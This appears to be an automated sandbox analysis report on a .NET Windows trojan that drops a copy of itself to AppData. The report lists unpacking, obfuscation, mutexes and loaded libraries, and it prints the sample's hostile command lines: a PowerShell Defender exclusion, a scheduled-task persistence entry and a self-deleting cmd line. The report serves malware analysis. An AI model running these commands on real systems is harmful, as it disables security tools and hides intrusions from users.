Source: 0.2.file.exe.4771620.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.4771620.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.4771620.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.file.exe.4771620.3.raw.unpack, ---.cs	Base64 encoded string: 'zN1Yj9qCCxTvBtE8ZCr2wBUeJkMb8tlMYxRddvhxxBWxB7pfQCKoKJjLY9f7wEZr'
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, ---.cs	Base64 encoded string: 'zN1Yj9qCCxTvBtE8ZCr2wBUeJkMb8tlMYxRddvhxxBWxB7pfQCKoKJjLY9f7wEZr'

Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.SetAccessControl
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.AddAccessRule
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.a990000.6.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.470c600.1.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.a990000.6.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.a990000.6.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.a990000.6.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.46a75e0.2.raw.unpack, NFwbODF5Z6KHtGRj3o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.470c600.1.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.470c600.1.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.470c600.1.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.46a75e0.2.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.46a75e0.2.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.46a75e0.2.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@26/12@2/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Mutant created: \Sessions\1\BaseNamedObjects\BZHYWPpwGfukgE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9B09.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.8e0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

.NET source code contains potential unpacker

Source: 0.2.file.exe.a990000.6.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	.Net Code: SX94kCJGRq System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.46a75e0.2.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	.Net Code: SX94kCJGRq System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.470c600.1.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	.Net Code: SX94kCJGRq System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.44e1010.4.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.9ea0000.5.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 8.2.NPadpxkCGKGoat.exe.3fe90f0.4.raw.unpack, e6rTRQoPQ4SF7GdoIg.cs	.Net Code: SX94kCJGRq System.Reflection.Assembly.Load(byte[])
Source: 8.2.NPadpxkCGKGoat.exe.2722d78.1.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01207823 pushfd ; ret	0_2_01207824
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01207819 pushfd ; ret	0_2_0120781A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01203205 push 38BA39B9h; iretd	0_2_01203211
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0A0EF144 push 1C00005Eh; iretd	0_2_0A0EF149
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02563205 push 38BA39B9h; iretd	8_2_02563211
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02567819 pushfd ; ret	8_2_0256781A
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02567823 pushfd ; ret	8_2_02567824

Source: file.exe	Static PE information: section name: .text entropy: 7.6955853381681605
Source: NPadpxkCGKGoat.exe.0.dr	Static PE information: section name: .text entropy: 7.6955853381681605

Source: 0.2.file.exe.a990000.6.raw.unpack, ISGJGicn0u5VHlJ0wR.cs	High entropy of concatenated method names: 'ypWtUcZvIs', 'bgGtOQOEjt', 'Lm6tHV5EtD', 'cXhtDSTYp1', 'J6gt3JWJF9', 'KVKtoPHcOR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.a990000.6.raw.unpack, jQOVJ8eMnmJ9dNL1B4.cs	High entropy of concatenated method names: 'tBAOW7FcRh', 'G3nOjFpf07', 'NPdUE7d2c6', 'wiuU6yaR9Q', 'gD6UpCOlIA', 'jZFU8OTN67', 'dXyUifWReM', 'HiiU1LPdrS', 'R6CUM45LWA', 'woOU9EkLxR'
Source: 0.2.file.exe.a990000.6.raw.unpack, rrWmUuTGXOFMKFWQ3X.cs	High entropy of concatenated method names: 'UbhUyiMQLm', 'nesUqKQKUv', 'lNBUFTgEwx', 'TvKUTcKy9e', 'yevUdsXqSw', 'C0VUZNeMqt', 'WhxUVl8XaC', 'rJlUYn6X5v', 'wURU3q8JnQ', 'NcHUtAW7v5'
Source: 0.2.file.exe.a990000.6.raw.unpack, SI1uuhxAvJKBhkcc7W.cs	High entropy of concatenated method names: 'eJnVRR53vd', 'CgOVc0HAfy', 'q2xYw7HjPZ', 'V1XYswA6cl', 'BUNV086fr9', 'JA7VGjcdmN', 'TOFVQrTvln', 'aOhVgAF5FQ', 'GmVVmoMqvc', 'jFIVJuydrH'
Source: 0.2.file.exe.a990000.6.raw.unpack, JGB4ptJyEgrMK4noUv.cs	High entropy of concatenated method names: 'ToString', 'gGEZ0j3NGV', 'un6ZNw3UU2', 'B3jZEiSb2v', 'qmSZ6Rq5PL', 'DInZpr70EL', 'YSHZ851sjU', 'VtcZi7O9NF', 'L8CZ1SrLMW', 'WisZMxtmm8'
